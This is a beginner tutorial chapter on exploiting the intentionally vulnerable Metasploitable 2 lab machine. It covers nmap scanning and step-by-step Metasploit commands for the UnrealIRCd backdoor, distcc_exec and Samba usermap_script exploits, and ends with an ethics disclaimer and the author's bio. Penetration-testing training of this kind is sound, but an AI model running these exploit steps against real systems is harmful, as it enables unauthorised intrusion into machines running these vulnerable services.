So far,you have seen windows exploitation .Now i will show you how to exploit linux operating system.In this chapter we will use metasploitable 2 which is intentionally vulnerable ubuntu linux based operating system.This operating system was developed by metasploit developers for security professionals to practise their tools on this operating system. It has vulnerable web applications "mutillidae and DVWA(Damn vulnerable web application) they contain all the vulnerabilities of OWASP top 10 and many more.You can download metasploitable 2 from the below link. After downloading from the above link you can install it in your Vmware.After system boots up you can login in your metasploitable 2 using username msfadmin and password msfadmin. First,we have to know the ip address,.Just type 'ifconfig' to know the ip address.Then go to your backtrack machine , use nmap tool to scan open ports and services to know which services are running in the metasploitable 2 machine.

Scanning with nmap: We have to use nmap to scan open ports and services running. Usage : nmap -sT -v ip address).

You can see many services running.Now i will choose an exploit UnrealIRCD IRC daemon.This version has backdoor and it is running on 6667 port. Now search for this exploit

Usage : search unrealircd

You can see only one exploit is available and you can see that the rank is excellent.

Step 1: use exploit/unix/irc/unreal_ircd_3281_backdoor

Type 'show options' to view availabe options Step 2: set RHOST 2 ip address)

Step 3: Type 'exploit'

Exploit 2: distcc_exec:This program makes it easy to scale large compiler jobs.You can know more
about this exploit in the below link. Step 1: use exploit/unix/misc/distcc_exec

Step 2: Type 'exploit'

Exploit 3: usermap_script: This is a command execution vulnerability in samba version 3.0.20.You

can read more about in below link.

Step 1: use exploit/multi/samba/usermap_script

Step 2: set RHOST and Type 'exploit'

Conclusion: That's all I have on my mind for this document.I would warmly welcome your feedback (either positive or negative).I need your suggestions which would help me move further.Thanking you very much for reading this document.Practise all the commands so as to gain confidence & command over metasploit.Please do not violate any security rules and do not do any malicious activity with these techniques(I hope u really would'nt).All techniques which I have mentioned here were executed on my laptop.If you have any queries,concerns please feel free to contact me(below given are my contact details).Finally, I would like to conclude with an excellent quote: " There is no security in life, only opportunity". - Mark Twain About me: I , kaleem shaik , am working as an ASE(Assistant Systems Engineer) in TCS.My areas of interest are 'Ethical hacking' , 'Penetration Testing' and anything & everything in relation with 'SECURITY'. Contact Details: Name : Kaleem Shaik Email :

Thanks & Regards - Kaleem Shaik

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